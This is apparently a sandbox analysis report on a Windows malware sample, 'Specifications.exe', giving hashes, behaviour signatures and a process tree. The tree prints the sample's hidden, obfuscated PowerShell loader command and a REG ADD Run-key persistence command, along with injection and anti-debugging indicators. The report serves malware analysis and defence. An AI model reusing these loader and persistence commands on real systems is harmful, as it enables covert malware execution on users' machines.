Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
17/06/2024, 11:36
Static task
static1
Behavioral task
behavioral1
Sample
Specifications.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Specifications.exe
Resource
win10v2004-20240611-en
General
-
Target
Specifications.exe
-
Size
757KB
-
MD5
1724bf93af4c371ce30369f59b3b43bf
-
SHA1
555106c85d133a1362904317afdae88e8c8d6b43
-
SHA256
b26fa277f86ce0b561cd4c563fc0e2a44623fdc0ad0cf97d6222537937df50f4
-
SHA512
fa2747830e3b7e0ca2ba9d8288e721ec96cf73608ba40787309b84ef4797a89f618613d2734b7a1850bfaa961da9ebb9f606e90c61c241c92d564bd7ad9f7df6
-
SSDEEP
12288:5FRwba0Ugzh4BIUFPefhPh7kwIpur5QF/gtVIhodF8NBQX4A/cORo:KOLgrUFEhPh7kNpDF/goKdyNBNA/c
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1996 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 1996 powershell.exe 3036 immeritoriously.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Tekknet = "%Fremdateret% -windowstyle minimized $lowy=(Get-ItemProperty -Path 'HKCU:\\Anthrapyridine\\').Antialbumin;%Fremdateret% ($lowy)" reg.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Synergastic\oprejsningers.for Specifications.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1996 powershell.exe 3036 immeritoriously.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1996 set thread context of 3036 1996 powershell.exe 32 -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\preadvisable\dorsolateral.ini Specifications.exe File opened for modification C:\Windows\resources\0409\Fordunkles\glaikit.pup Specifications.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x000f00000001226c-18.dat nsis_installer_1 behavioral1/files/0x000f00000001226c-18.dat nsis_installer_2 -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2580 reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1996 powershell.exe 1996 powershell.exe 1996 powershell.exe 1996 powershell.exe 1996 powershell.exe 1996 powershell.exe 1996 powershell.exe 1996 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1996 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1996 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1576 wrote to memory of 1996 1576 Specifications.exe 28 PID 1576 wrote to memory of 1996 1576 Specifications.exe 28 PID 1576 wrote to memory of 1996 1576 Specifications.exe 28 PID 1576 wrote to memory of 1996 1576 Specifications.exe 28 PID 1996 wrote to memory of 2792 1996 powershell.exe 30 PID 1996 wrote to memory of 2792 1996 powershell.exe 30 PID 1996 wrote to memory of 2792 1996 powershell.exe 30 PID 1996 wrote to memory of 2792 1996 powershell.exe 30 PID 1996 wrote to memory of 3036 1996 powershell.exe 32 PID 1996 wrote to memory of 3036 1996 powershell.exe 32 PID 1996 wrote to memory of 3036 1996 powershell.exe 32 PID 1996 wrote to memory of 3036 1996 powershell.exe 32 PID 1996 wrote to memory of 3036 1996 powershell.exe 32 PID 1996 wrote to memory of 3036 1996 powershell.exe 32 PID 3036 wrote to memory of 2516 3036 immeritoriously.exe 33 PID 3036 wrote to memory of 2516 3036 immeritoriously.exe 33 PID 3036 wrote to memory of 2516 3036 immeritoriously.exe 33 PID 3036 wrote to memory of 2516 3036 immeritoriously.exe 33 PID 2516 wrote to memory of 2580 2516 cmd.exe 35 PID 2516 wrote to memory of 2580 2516 cmd.exe 35 PID 2516 wrote to memory of 2580 2516 cmd.exe 35 PID 2516 wrote to memory of 2580 2516 cmd.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\Specifications.exe"C:\Users\Admin\AppData\Local\Temp\Specifications.exe"1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Skfulds175=Get-Content 'C:\Users\Admin\AppData\Local\hotdoggen\Bulkcarrieren.Hou';$Mesenteronic=$Skfulds175.SubString(54610,3);.$Mesenteronic($Skfulds175)"2⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"3⤵PID:2792
-
-
C:\Users\Admin\AppData\Local\Temp\immeritoriously.exe"C:\Users\Admin\AppData\Local\Temp\immeritoriously.exe"3⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tekknet" /t REG_EXPAND_SZ /d "%Fremdateret% -windowstyle minimized $lowy=(Get-ItemProperty -Path 'HKCU:\Anthrapyridine\').Antialbumin;%Fremdateret% ($lowy)"4⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tekknet" /t REG_EXPAND_SZ /d "%Fremdateret% -windowstyle minimized $lowy=(Get-ItemProperty -Path 'HKCU:\Anthrapyridine\').Antialbumin;%Fremdateret% ($lowy)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:2580
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5f9cfb3763d8507c5f1c448cfdbe34957
SHA1eed922ec7b79a7a7cbd9932c9114ebfee0056744
SHA256e9b9d717a2185eef8a258e01429768017d26d6167cb62084c241b9b982fb64d4
SHA51206f9c3e6f24b06e19a0fa3cc5b933934cdf3e62d4f5510ae3bedcc9938837fdcdfcead02fe4de8a89893f7ccd3dd402c1c8456c65319f2562619b9229d16853f
-
Filesize
319KB
MD5ac1b87f114afc3a08241f726d236e294
SHA13015700d1c89f76664d0a6ac7004f741e41e6d5f
SHA256a9b56415b6be3bea2c53c028197e668348bbff6b6fe2d8ed2f69b811fe8ee759
SHA512b90c4bedcc75a748692326fa89b2b02f797f6b34f3a5a665d552c67b13ce9e55b21fa0587aaeb02ba055b10938e6e45e2e45bf42a64b8af999d46138f92bb27d
-
Filesize
757KB
MD51724bf93af4c371ce30369f59b3b43bf
SHA1555106c85d133a1362904317afdae88e8c8d6b43
SHA256b26fa277f86ce0b561cd4c563fc0e2a44623fdc0ad0cf97d6222537937df50f4
SHA512fa2747830e3b7e0ca2ba9d8288e721ec96cf73608ba40787309b84ef4797a89f618613d2734b7a1850bfaa961da9ebb9f606e90c61c241c92d564bd7ad9f7df6